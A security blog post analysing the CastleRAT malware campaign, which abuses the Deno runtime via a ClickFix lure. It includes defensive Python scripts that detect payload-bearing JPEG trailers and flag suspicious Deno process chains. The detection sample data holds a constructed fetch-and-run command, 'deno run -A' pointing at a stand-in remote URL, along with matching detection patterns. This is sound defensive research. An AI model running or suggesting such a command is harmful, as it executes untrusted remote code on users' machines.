👤 CRYSTALPROXY
🗓️ 12 Mar 2026  

Trusted Tools, Treacherous Tricks: How CastleRAT Weaponizes Deno to Evade Enterprise Defenses

Cybercriminals abuse a popular JavaScript runtime to slip past security, turning trusted software into a stealthy attack vector.

It began with a simple browser error. A pop-up nudged the user to “fix” the issue by copying a command into their Windows terminal. What followed was not a routine repair, but the opening act of a sophisticated digital heist - one that would expose a new frontier in cybercrime, where even the most reputable tools are twisted for malicious gain.

Fast Facts

  • CastleRAT is the first known malware campaign to abuse the Deno JavaScript runtime as a stealthy delivery platform.
  • The initial attack leverages a social engineering trick known as “ClickFix,” luring victims into running malicious commands themselves.
  • By installing Deno - a trusted, signed runtime - the attackers give their code a legitimately signed host process that traditional antivirus has no reason to flag.
  • Payloads are concealed in seemingly harmless files, including a JPEG image, and decoded in memory to evade file-based scans.
  • CastleRAT targets sensitive data, including cryptocurrency wallets, browser history, and developer credentials.

The Anatomy of a Modern Malware Masterpiece

ThreatDown Research’s recent findings have rocked the cybersecurity world: for the first time, attackers are leveraging the Deno JavaScript runtime - a tool trusted by developers worldwide - as a launchpad for CastleRAT, an advanced remote access Trojan.

The attack’s ingenuity lies in its simplicity and psychological manipulation. It begins with the “ClickFix” ruse: a user, frustrated by a persistent browser error or CAPTCHA, is encouraged to paste a command into their Windows terminal. Unbeknownst to them, that command downloads and installs Deno. Because Deno is a legitimate, digitally signed runtime, signature- and reputation-based antivirus checks have nothing to flag; the only malicious thing on the machine at this point is what the attacker intends to run through it.

But this is only the opening move. With Deno in place, the attackers feed it obfuscated JavaScript, so their code executes inside a process that allow-lists and reputation checks treat as a legitimate developer tool rather than as malware. That script then fetches additional components: a Python environment (disguised under the name “Petuhon”) and a seemingly innocent JPEG file. Hidden within the image is the encrypted CastleRAT payload.

To maximize stealth, the attackers use reflective PE loading: the Python stage decrypts the CastleRAT executable and maps it straight into memory, so the RAT itself is never written to disk as a file and file-based antivirus scans have nothing to inspect. (The Deno installer, the Python environment and the carrier image do land on disk, and those are the artefacts worth hunting for.) The Python script is wrapped in PyArmor, which keeps the loader logic and the payload opaque until the moment of execution.
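The article says the encrypted payload is hidden in a JPEG but not how. The following triage check, an added example that is not code from the article or from ThreatDown, assumes the most common carrier trick (payload bytes appended after the JPEG end-of-image marker) and walks the JPEG marker structure rather than searching for the `FF D9` byte pair, because an embedded EXIF thumbnail carries its own end-of-image marker and would fool a naive search. The sample images are constructed byte strings, and the random trailer stands in for an encrypted blob.

```python
"""Carrier-file triage: does a JPEG carry extra bytes after its end-of-image marker?

Added example, not code from the article or from ThreatDown. Assumes the
"payload appended after EOI" layout; the sample images below are constructed.
"""
import math
import random
from collections import Counter

SOI, EOI = b"\xff\xd8", b"\xff\xd9"
# Markers that carry no length field: TEM, SOI, RST0..RST7.
STANDALONE = {0x01, 0xD8} | set(range(0xD0, 0xD8))


def jpeg_end_offset(data: bytes) -> int:
    """Offset just past the EOI that closes the image's own scan data."""
    if data[:2] != SOI:
        raise ValueError("not a JPEG: no SOI")
    pos = 2
    while pos + 1 < len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xFF:            # fill byte, skip it
            pos += 1
            continue
        pos += 2
        if marker == 0xD9:            # EOI: the image proper ends here
            return pos
        if marker in STANDALONE:
            continue
        if marker == 0x00:
            raise ValueError(f"invalid marker at offset {pos - 2}")
        pos += int.from_bytes(data[pos:pos + 2], "big")   # length field includes itself
        if marker == 0xDA:            # SOS: skip entropy-coded data up to the next real marker
            while True:
                pos = data.find(b"\xff", pos)
                if pos < 0 or pos + 1 >= len(data):
                    raise ValueError("truncated scan data")
                nxt = data[pos + 1]
                if nxt == 0x00 or 0xD0 <= nxt <= 0xD7:   # stuffed FF or restart marker
                    pos += 2
                    continue
                break
    raise ValueError("no EOI found")


def shannon_entropy(buf: bytes) -> float:
    n = len(buf)
    return -sum(c / n * math.log2(c / n) for c in Counter(buf).values()) if n else 0.0


def assess(data: bytes):
    """Return (trailer_length, trailer_entropy_bits, verdict)."""
    trailer = data[jpeg_end_offset(data):]
    if not trailer:
        return 0, 0.0, "clean"
    h = shannon_entropy(trailer)
    verdict = "high-entropy trailer" if h >= 7.0 else "low-entropy trailer"
    return len(trailer), h, verdict


# --- constructed samples (not real captures) ------------------------------
def _segment(marker: int, body: bytes) -> bytes:
    return b"\xff" + bytes([marker]) + (len(body) + 2).to_bytes(2, "big") + body

_APP0 = _segment(0xE0, b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
_APP1 = _segment(0xE1, b"Exif\x00\x00" + SOI + EOI)      # thumbnail-like inner EOI
_SOS = _segment(0xDA, b"\x01\x01\x00")
_SCAN = b"\x12\xff\x00\x34\xff\xd0\x56"                  # a stuffed FF and an RST0
CLEAN = SOI + _APP0 + _APP1 + _SOS + _SCAN + EOI

_rng = random.Random(1)
ENCRYPTED = CLEAN + bytes(_rng.getrandbits(8) for _ in range(4096))  # stand-in for ciphertext
CHATTY = CLEAN + b"Created with CameraApp 2.0\n" * 20                 # benign text trailer

if __name__ == "__main__":
    for name, blob in (("clean", CLEAN), ("encrypted", ENCRYPTED), ("chatty", CHATTY)):
        print(name, assess(blob))
```

A high-entropy trailer is not proof of malice (some editors append metadata), but a multi-kilobyte random-looking tail on an image that a freshly installed runtime just downloaded is exactly the kind of artefact worth pulling for deeper analysis.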

Once active, CastleRAT acts as a digital spy: it logs keystrokes, hijacks the clipboard, and hunts for valuable data such as cryptocurrency wallets, browser history and developer credentials. Everything it steals is quietly transmitted to remote command-and-control servers without the victim’s knowledge.

This campaign’s success is a stark reminder that cybercriminals are not just writing new malware; they are innovating in how they deliver it, exploiting trusted software and human psychology alike. Because every stage up to the final payload runs through legitimate, signed binaries, static and signature-based defenses have little to work with, and experts urge organizations to rely on behavioral monitoring and endpoint detection that watches what those trusted processes actually do: which process launched Deno, what it was told to run, and what it spawned next.
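What “watching what trusted processes do” looks like in practice, as an added example that is not code from the article or from ThreatDown: three behavioural rules run over process-creation telemetry for the chain the article describes (a command typed into a shell launches Deno, Deno runs a remote script with every permission granted, Deno spawns Python). The rules are assumptions about how that chain appears in logs, the event shape is a simplified Sysmon-style record, and all hosts, paths and PIDs in the sample are invented.

```python
"""Behavioural triage for the CastleRAT/Deno delivery chain.

Added example, not code from the article or from ThreatDown. The rules are
assumptions about how the described chain shows up in process telemetry, and
every sample event below is constructed.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str       # full path of the created process
    cmdline: str
    user: str


# Where a human (or a ClickFix lure) types commands: Explorer's Run dialog and
# Windows Terminal both end up launching one of these shells.
INTERACTIVE_LAUNCHERS = {"explorer.exe", "windowsterminal.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
PYTHON = {"python.exe", "pythonw.exe"}

# Deno permission flags: -A / --allow-all removes every sandbox restriction.
ALLOW_ALL = re.compile(r"(?:^|\s)(?:-A|--allow-all)(?:\s|$)")
REMOTE_MODULE = re.compile(r"https?://\S+", re.IGNORECASE)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def triage(events):
    """Return findings as (rule, pid, reason) tuples.

    R1  interactive launcher -> shell -> deno.exe  (a pasted command started Deno)
    R2  deno run with -A/--allow-all and a remote module URL
    R3  deno.exe spawning python.exe               (second-stage loader)
    """
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        img = basename(e.image)
        parent = by_pid.get(e.ppid)
        pimg = basename(parent.image) if parent else ""
        grand = by_pid.get(parent.ppid) if parent else None
        gimg = basename(grand.image) if grand else ""

        if img == "deno.exe":
            if pimg in SHELLS and gimg in INTERACTIVE_LAUNCHERS:
                findings.append(("R1", e.pid, f"{gimg} -> {pimg} -> deno.exe"))
            toks = e.cmdline.split()
            if "run" in toks and ALLOW_ALL.search(e.cmdline) and REMOTE_MODULE.search(e.cmdline):
                findings.append(("R2", e.pid, "deno run with all permissions and remote module: " + e.cmdline))
        if img in PYTHON and pimg == "deno.exe":
            findings.append(("R3", e.pid, f"deno.exe -> {img}: {e.cmdline}"))
    return findings


# Constructed sample telemetry: one ClickFix-shaped chain and one developer
# using Deno legitimately. Hosts, paths, URLs and PIDs are invented.
SAMPLE = [
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe", r"ACME\jdoe"),
    ProcEvent(200, 100, r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c deno run -A https://cdn.example.invalid/fix.js", r"ACME\jdoe"),
    ProcEvent(300, 200, r"C:\Users\jdoe\.deno\bin\deno.exe",
              "deno run -A https://cdn.example.invalid/fix.js", r"ACME\jdoe"),
    # The article only says the Python stage is disguised as "Petuhon"; this path is invented.
    ProcEvent(400, 300, r"C:\Users\jdoe\AppData\Local\Temp\Petuhon\python.exe",
              "python.exe loader.py", r"ACME\jdoe"),
    # Benign: an editor task running a local script with one narrow permission.
    ProcEvent(500, 1, r"C:\Program Files\Microsoft VS Code\Code.exe", "Code.exe", r"ACME\dev"),
    ProcEvent(510, 500, r"C:\Users\dev\.deno\bin\deno.exe",
              "deno run --allow-net=localhost:8000 main.ts", r"ACME\dev"),
]

if __name__ == "__main__":
    for rule, pid, reason in triage(SAMPLE):
        print(rule, pid, reason)
```

On a developer workstation R1 alone is noisy (people do launch Deno from a shell), so treat it as context and alert on R2 or R3, or on R1 combined with either. Note that the benign Deno invocation with a scoped `--allow-net` and a local module trips none of the rules, which is the point: the signal is not Deno itself but a fresh install being handed a remote script with every permission and then spawning an interpreter.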

Conclusion: When Trust Becomes a Trojan Horse

The CastleRAT-Deno campaign signals a dangerous new era: when even the most reputable developer tools can be repurposed as weapons. Security teams must now watch not only for suspicious files, but for suspicious behaviors - even when they’re carried out by “trusted” applications. In this shadowy arms race, vigilance, adaptability, and a healthy dose of skepticism are the new keys to survival.

WIKICROOK

  • Deno: Deno is a secure-by-default runtime for JavaScript and TypeScript that runs code outside the browser; a script gets no file, network or environment access unless the launching command grants it. That sandbox protects an operator who runs untrusted code carefully; it does nothing against an attacker who controls the command line and simply grants every permission.
  • Remote Access Trojan (RAT): A Remote Access Trojan (RAT) is malware that lets attackers secretly control a victim’s computer from anywhere, enabling theft and spying.
  • Reflective PE Loading: Reflective PE loading maps a Windows executable (PE file) into a process’s memory and runs it from there without ever writing it to disk, bypassing file-based detection and leaving memory forensics as the defender’s main avenue of analysis.
  • Obfuscated JavaScript: Obfuscated JavaScript is code deliberately scrambled to hide its true purpose, making it hard for humans and security tools to analyze or detect threats.
  • Endpoint Detection and Response (EDR): Endpoint Detection and Response (EDR) tools record and monitor behavior on endpoints (process creation, command lines, memory, network connections) rather than only scanning files, which is why they are the recommended defense against fileless attacks that traditional antivirus misses.

Tags: CastleRAT, Deno, Cybercrime

CRYSTALPROXY, Secure Routing Analyst